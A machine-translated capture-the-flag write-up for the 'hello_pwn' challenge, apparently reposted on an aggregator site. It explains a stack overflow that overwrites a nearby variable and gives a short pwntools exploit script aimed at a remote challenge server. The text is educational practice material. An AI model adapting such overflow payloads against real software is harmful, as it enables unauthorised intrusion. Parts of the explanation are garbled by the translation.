hello_pwn--writeup

Others 2020-03-01 15:59:11 views: null

File Download:

Links: https://pan.baidu.com/s/1Qp1fxOU8b4VobwSIouK7OQ
extraction code: g47i 
 

0x01. Analysis

checksec:

64 program, open NX.

Source:

The process is very simple, as long as the value of this variable is equal to 106c behind this number on it, in front of the read function, obviously stack overflow, just think of ways to change the value of the following variables on the line.

The difference between these two variables was found to 4, so only when the overflow filled void four bytes of information, then that number back filling, can be sub function to perform, get the flag.

0x02.exp

##!/usr/bin/env python 
from pwn import*

r=remote("111.198.29.45",44362)
#r=process('./hellopwn')

payload=4*'A'+p64(1853186401)

r.recvuntil("bof")
r.sendline(payload)

r.interactive()

 

The Ying Xpress -> A
Published 76 original articles · won praise 82 · views 7079
Private letter concerns

Guess you like

Origin blog.csdn.net/ATFWUS/article/details/104591776
pwn
Recommended
Ranking
Solve the problem that the Chinese display of the drawing using python matplotlib under the Linux system is displayed as a box
[Conference Call for Papers] The 5th International Conference on Civil Engineering, Environmental Resources and Energy Materials (CCESEM 2023)
4-yl Fast Fourier Transform
DataGirdView interlaced display color
[Docker implements test deployment CI/CD----Dingding alarm after the build is successful (7)]
[Asp.net core series] 6 the complete structure of a project in actual combat
The new version of OpenCenterV3 management background
Why can box plots detect outliers and what is the principle?
[Switch] jumbo frame Introduction
C++对象移动(3)——移动构造函数
Daily
More
2024-05-05(0)
2024-05-04(18)
2024-05-03(8)
2024-05-02(0)
2024-05-01(4)
2024-04-30(36)
2024-04-29(5)
2024-04-28(12)
2024-04-27(29)
2024-04-26(22)

Code World

© 2018 codetd.com